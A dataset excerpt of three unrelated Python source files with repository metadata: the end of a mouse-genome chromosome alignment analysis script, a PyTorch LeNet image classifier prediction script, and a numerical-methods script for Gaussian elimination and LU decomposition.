bit_wise_seq_list = [bit_wise_seq[i] for i in np.arange(1, 20)]
return get_inter_cell_dist(cell_i_dist[np.ix_(cell_i_seq, cell_i_seq)], cell_j_dist[np.ix_(cell_j_seq, cell_j_seq)]), bit_wise_seq_list, cell_j_seq, cell_i_seq ##############EXTEA OUTPUT
def main():
global cum_lens
global num_chrs
global data
global reads_to_include
num_chrs = 19
cum_lens = get_chr_cumulative_lengths()
clustering_method = "pckmeans"
reads_to_include = "inliers"
print("clustering method: ", clustering_method)
print("including {} reads".format(reads_to_include))
data = read_data(clustering_method, reads_to_include) #global variables
data = data.loc[data.stage == "4cell"]
cids_4cell = data.cell_index.unique()
for bin_size in [30e6]:#200e6, 100e6, 50e6,
for sample in ["mean", "first", "last"]:
print("bin size: {}, sample {}, Number of chromosomes: {}".format(int(bin_size/1e6), sample, num_chrs))
with Pool(6) as p:
p.starmap(align_cell_i, zip(cids_4cell, repeat(bin_size), repeat(sample)))
def consistency_analysis():
reads_to_inlcude = "inliers" #"all"
clustering_method = "pckmeans" # "igs"
num_chrs = 19
data = read_data(clustering_method, reads_to_inlcude) #cells with less than 150 reads are deleted: 80., 84., 105., 113.
cum_lens = get_chr_cumulative_lengths()
fig, axes = plt.subplots(4,4, figsize = (20,20))
for i, bin_size in tqdm(enumerate([50e6, 25e6, 10e6, 1e6])):
for j, num_samples in tqdm(enumerate([5, 25, 50, 75])):
print("\n bin size: ", bin_size)
print("\n num samples: ", num_samples)
proportion_matching = []
variances = []
cell_i_index = 91
cell_j_index = 93
# for cell_i_index in tqdm(data.loc[data.stage == '4cell', 'cell_index'].unique()[0:2]):
# cids_after_i = data.loc[data.cell_index >= cell_i_index, 'cell_index'].unique()[1:3]
# for cell_j_index in cids_after_i:
cell_i = data.loc[(data.cell_index==cell_i_index) & (data.chr < 20)].copy()
cell_i['abs_pos'] = -1
cell_i['abs_pos'] = cell_i.pos.copy() + [cum_lens[ch-1] for ch in cell_i.chr] #encodes the absolute position of the reads along the linear genome
cell_j = data.loc[(data.cell_index==cell_j_index) & (data.chr < 20)].copy()
cell_j['abs_pos'] = -1
cell_j['abs_pos'] = cell_j.pos.copy() + [cum_lens[ch-1] for ch in cell_j.chr] #encodes the absolute position of the reads along the linear genome
bins, num_bins_per_chr = get_bins(bin_size, cum_lens, num_chrs)
cell_i_dist,_ = pckmeans_get_dist_mat_binned(cell_i, bins, num_bins_per_chr)
cell_j_dist,_ = pckmeans_get_dist_mat_binned(cell_j, bins, num_bins_per_chr)
# print("intra cell distance matrix shape: ", cell_i_dist.shape)
min_dists = []
num_trials = 100
for trial in range(num_trials):
dists = []
for sample in range(num_samples):
if sample == 0:
order = np.arange(1,20)
elif sample == 1:
order = np.arange(19,0,-1)
else:
order = np.arange(1,20)
np.random.shuffle(order)
d, bit_seq, bin_seq, _ = get_aligned_inter_cell_dist(cell_i_dist, cell_j_dist, num_bins_per_chr, chr_seq = order) #np.arange(19,0,-1)
dists.append(d[0])
min_dists.append(np.round(np.min(dists), 4))
# proportion_matching.append(np.mean(dists < np.min(dists) +0.05))
# variances.append(np.var(dists))
print(min_dists)
axes[j,i].hist(min_dists, bins = 8)
axes[j,i].set_title("bin size {}".format(bin_size/1e6))
axes[j,i].set_ylabel("sample size: {}".format(num_samples))
# axes[1,i].hist(variances, bins = 20)
# axes[1,i].set_xlabel("variances")
plt.suptitle("cell indeces {} and {}".format(cell_i_index, cell_j_index))
plt.savefig("figures/sequential_algorithm_consistency_min_distance_distribution_cells{}_{}.png".format(cell_i_index, cell_j_index))
if __name__ == "__main__":
main()
# consistency_analysis()
|
pdavar/Analysis-of-3D-Mouse-Genome-Organization
|
chromosome_alignment.py
|
chromosome_alignment.py
|
py
| 16,670
|
python
|
en
|
code
| 0
|
github-code
|
6
|
200126759
|
import torch
import torchvision.transforms as transforms
from PIL import Image
from model import LeNet
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
def main():
transform = transforms.Compose(
[transforms.Resize((32, 32)),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
classes = ('plane', 'car', 'bird', 'cat',
'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
net = LeNet()
net = net.to(device)
net.load_state_dict(torch.load('Lenet.pth'))
im = Image.open(r'data/plane1.jpg')
im = transform(im) # [C, H, W]
im = torch.unsqueeze(im, dim=0).to(device) # [N, C, H, W]
with torch.no_grad():
outputs = net(im)
predict = torch.max(outputs, dim=1)[1].cpu().numpy()
print(classes[int(predict)])
if __name__ == '__main__':
main()
|
ChengZhangX/Deeplearning-for-cv
|
LetNet model/predict.py
|
predict.py
|
py
| 893
|
python
|
en
|
code
| 0
|
github-code
|
6
|
73983128507
|
import numpy as np
import sys
matrix = None
def main():
global matrix
matrix = np.array([[1,1,-1],[6,2,2],[-3,4,1]],dtype=float)
aug_matrix = np.concatenate((matrix,identity_matrix(3)),axis=1)
#gaussian2(aug_matrix) #gaussian elimination with maximum pivoting
LUdecomp(matrix) #LU decompose a square matrix
def identity_matrix(n):
m = np.empty([n,n],dtype=float)
for i in range (0,n):
for j in range (0,n):
if(i==j): m[i][j] = 1
else: m[i][j] = 0
return m
def gaussian2(m):
print()
print("Gaussian Elimination 2.0:")
print()
for j in range (0,m.shape[0]):
max_pivot_row = j
max_pivot = m[j][j]
for a in range (1, m.shape[0]-j):
if(m[j+a][j]>max_pivot):
max_pivot_row = j+a
print("maximum pivoting: R",(j+1),"<->","R",(max_pivot_row+1))
print()
m[[j,max_pivot_row]] = m[[max_pivot_row,j]]
if(m[j][j]==0):
print("no unique solution")
break
for i in range (j+1, m.shape[0]):
c = (m[i][j])/(m[j][j])
if(c==0):
print("c==0!!")
continue
for a in range (0, m[j].shape[0]):
m[i][a]=m[i][a]-c*(m[j][a])
print("row operation: R",(i+1),"-",c,"*R",(j+1))
print(m)
print()
def LUdecomp(m):
L = identity_matrix(m.shape[0])
for j in range (0, m.shape[0]):
for i in range (j+1, m.shape[0]):
c = (m[i][j])/(m[j][j])
if(c==0):
continue
for a in range (0, m[j].shape[0]):
m[i][a]=m[i][a]-c*(m[j][a])
L[i][j] = c
print("row operation: R",(i+1),"-",c,"*R",(j+1))
print(m)
print()
print("matrix L is:")
print(L)
print("matrix U is:")
print(m)
main()
|
akiraminase/numerical_methods
|
matrix_calc.py
|
matrix_calc.py
|
py
| 2,023
|
python
|
en
|
code
| 0
|
github-code
|
6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.